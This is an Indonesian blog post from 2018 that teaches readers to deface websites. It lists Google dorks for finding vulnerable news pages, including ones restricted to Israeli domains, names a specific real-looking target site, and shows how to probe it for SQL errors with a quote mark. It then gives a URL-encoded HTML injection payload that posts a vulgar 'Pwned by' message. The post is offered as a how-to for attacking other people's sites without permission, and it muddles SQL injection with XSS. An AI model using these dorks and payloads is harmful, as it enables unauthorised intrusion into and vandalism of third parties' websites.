Cara Deface Website: Belajar Deface Dengan Metode XSS
Sunday 2 December 2018
Add Comment
1. Pertama kita siapkan dork nya terlebih dahulu agar dapat memulai belajar cara deface website
Ketik dork di google seperti berikut ini:
inurl:/news.php?id=
inurl:/news.php?id= site.co.il (israel)
2. Kemudian pilih salah satu website target anda
3. Sebagai contoh saya mendapatkan target website untuk di deface, yaitu http://isr-tkd.com/index.php?cntr=e/news.php?id=1
4. Selanjutnya cek website apakan vuln atau tidak, cara nya tambahkan tanda koma atas ( ' ) di akhir id=1'
contoh:
http://isr-tkd.com/index.php?cntr=e/news.php?id=1'website yang vuln akan menampilkan error, dengan tulisan seperti dibawah ini:
- Warning: mysql_result() expects parameter 1 to be resource, boolean given in /home/isrtkd/public_html/press.php on line 4
- You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''
5. Kemudian lakukan penambahan exploit untuk melanjutkan deface website menggunakan XSS
seperti contoh dibawah ini,
http://isr-tkd.com/index.php?cntr=e/news.php?id=1%3Ch1%3ECuk%20Jancuk%20Pwned%20by%20https://www.wakilmu.com%3C/h1%3E
Yang nanti nya akan menampilkan tulisan kode deface "Cuk Jancuk Pwned by https://www.wakilmu.com" seperti pada gambar diatas..
Selamat mencoba, terima kasih sudah berkunjung..
Nantikan next artikel cara-cara deface website dengan berbagai macam teknik lainnya..
0 Response to "Cara Deface Website: Belajar Deface Dengan Metode XSS"
Post a Comment